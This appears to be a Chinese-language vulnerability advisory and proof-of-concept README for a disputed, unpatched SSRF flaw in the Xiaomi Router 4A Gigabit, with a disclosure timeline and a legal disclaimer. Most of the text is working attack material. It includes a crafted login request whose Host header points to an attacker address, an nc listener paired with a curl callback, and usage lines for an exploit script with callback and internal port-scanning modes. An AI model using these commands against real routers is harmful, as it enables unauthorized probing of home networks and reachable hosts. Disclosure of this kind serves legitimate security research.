| 字段 | 值 |
|---|
| 设备 | 小米路由器4A千兆版 |
| 固件版本 | 3.0.24(国际版) |
| CVE | CVE-2026-26898 (存在争议——详见下方披露状态) |
| CWE | CWE-918(服务器端请求伪造) |
| CVSS 3.1 | 8.6(高危)——研究者评估;供应商对严重性存在异议 |
状态:供应商提出异议——此报告未被小米接受。
此处使用CVE-2026-26898仅用于追踪;鉴于供应商争议,应视为存在异议/未确认,而非供应商确认。
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] 正在检查 192.168.31.1 是否存在漏洞...
[*] 本地IP: 192.168.31.235
[*] 测试端口: 44444
[+] 存在漏洞!路由器已回连至 192.168.31.235:44444
# 终端1:启动监听器
nc -l 4444
# 终端2:发送恶意请求
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| 文件 | 描述 |
|---|---|
xiaomi_ssrf_exploit.py | 包含多种模式的完整利用脚本 |
# 检查是否存在漏洞
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check
# 回调模式
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444
# 端口扫描
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443
| 日期 | 事件 |
|---|---|
| 2026-01-15 | 发现漏洞;开发PoC |
| 2026-01-16 | 通过HackerOne提交给小米(#3513458) |
| 2026-01-23 | 小米将该报告标记为信息性(低风险,不予修复) |
| 2026-06-03 | 公开公告发布(本仓库)——供应商争议,未打补丁 |
本利用脚本仅供教育和授权安全测试使用。未经授权访问计算机系统是违法的。
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace